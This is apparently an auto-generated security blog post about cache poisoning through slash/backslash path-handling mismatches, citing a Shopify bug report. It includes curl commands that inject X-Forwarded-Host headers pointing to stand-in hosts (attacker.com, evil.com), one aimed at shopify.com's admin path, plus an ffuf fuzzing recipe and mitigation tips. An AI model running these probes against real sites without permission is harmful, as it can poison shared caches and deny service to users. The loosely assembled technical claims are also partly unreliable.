Exploiting Slash/Backslash Mismatch to Trigger Cache Poisoning

By /

Listen to this Post

Featured Image
This vulnerability discovered by Bassem Sadaqah led to a CDN-wide Denial-of-Service (DoS) on Shopify, demonstrating how simple path normalization issues can cause major disruptions in mature systems.

You Should Know:

1. Cache Poisoning via Path Mismatch

When a CDN or web server handles URLs with mixed slashes (/ vs \) inconsistently, attackers can poison caches by forcing the server to cache malicious responses for legitimate requests.

Example Exploit:

curl -i "https://victim.com/path\to\malicious" -H "Host: victim.com" -H "X-Forwarded-Host: attacker.com"

2. Testing for Path Normalization Flaws

Use these commands to check if a server normalizes paths inconsistently:

Linux/Windows Test:

curl -I "https://target.com/path\to\test" 
curl -I "https://target.com/path/to/test"

Compare responses for discrepancies.

3. CDN Cache Poisoning Payloads

Inject malicious headers to hijack cached responses:

curl -i "https://shopify.com/\admin" -H "X-Forwarded-Host: evil.com"

4. Automated Scanning with ffuf

Use tools like `ffuf` to fuzz path variations:

ffuf -w slashes.txt -u "https://target.com/FUZZ" -H "Host: target.com"

Where `slashes.txt` contains:

path/to/test 
path\to\test 
path\/to\/test

5. Mitigation Steps

  • For Developers: Normalize paths server-side before processing.
  • For Admins: Configure CDNs (Cloudflare, Akamai) to reject mixed slashes.
  • WAF Rules: Block requests with backslashes (\) in URLs.

What Undercode Say

Cache poisoning via slash/backslash mismatch is a low-hanging fruit for attackers targeting high-traffic platforms. Always:

1. Test path normalization during penetration testing.

2. Monitor cache headers (`Age`, `X-Cache`).

  1. Use tools like Burp Suite to automate detection.

Relevant Commands:

 Check cache status 
curl -I "https://target.com" | grep -i "cache|age"

Force cache bypass 
curl "https://target.com?bypass=$(date +%s)"

Expected Output:

A CDN serving poisoned content to users due to inconsistent path handling, leading to DoS or data leakage.

Prediction

As CDNs grow more complex, similar normalization flaws will emerge in edge-case routing logic, making this a persistent threat.

Reference:

Shopify HackerOne Report

IT/Security Reporter URL:

Reported By: 0xacb Shopify – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: